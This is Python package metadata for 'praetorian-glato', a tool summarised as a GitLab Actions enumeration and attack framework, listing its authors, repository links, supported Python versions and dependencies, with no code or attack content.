Metadata-Version: 2.4
Name: praetorian-glato
Version: 1.0.0b5
Summary: GitLab Actions Enumeration and Attack Framework
Author-email: John Stawinski <john.stawinski@praetorian.com>, Matthew Jackoski <matthew.jackoski@praetorian.com>, Elgin Lee <elgin.lee@praetorian.com>, Mason Davis <mason.davis@praetorian.com>
License:                                  Apache License
Project-URL: Homepage, https://github.com/praetorian-inc/glato
Project-URL: Repository, https://github.com/praetorian-inc/glato
Project-URL: Issues, https://github.com/praetorian-inc/glato/issues
Classifier: Programming Language :: Python :: 3.7
Classifier: Programming Language :: Python :: 3.8
Classifier: Programming Language :: Python :: 3.9
Classifier: Programming Language :: Python :: 3.10
Classifier: Programming Language :: Python :: 3.11
Requires-Python: >=3.7
License-File: LICENSE
Requires-Dist: colorama
Requires-Dist: requests>=2.28.1
Requires-Dist: pyyaml
Requires-Dist: packaging
Requires-Dist: cryptography
Requires-Dist: beautifulsoup4
Provides-Extra: test
Requires-Dist: flake8; extra == "test"
Requires-Dist: pytest>=7.1.2; extra == "test"
Requires-Dist: pytest-cov; extra == "test"
Requires-Dist: GitPython>=3.1.31; extra == "test"
Dynamic: license-file
